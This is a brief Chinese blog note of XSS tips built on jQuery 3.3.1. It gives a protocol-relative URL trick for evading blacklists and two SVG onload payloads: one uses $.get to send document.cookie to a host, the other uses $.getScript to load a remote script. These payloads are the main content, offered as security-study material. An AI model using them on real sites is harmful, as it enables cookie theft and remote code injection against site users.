13
2018
12

XSS : 围绕 jQuery Libary 的一些跨站知识点 [补充ing]

当前jQuery版本:v 3.3.1


知识点:


  1. `//`缺省协议,该协议可以精简payload,或绕过黑名单策略

  2. `$.get`方法,发起一个get请求,比如<svg onload="$.get('//127.0.0.1/xss.html',document.cookie)">

  3. `$.getScript`方法,远程调用一个js脚本,比如<svg onload="$.getScript('//127.0.0.1/xss.js')">

« 上一篇 下一篇 »

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。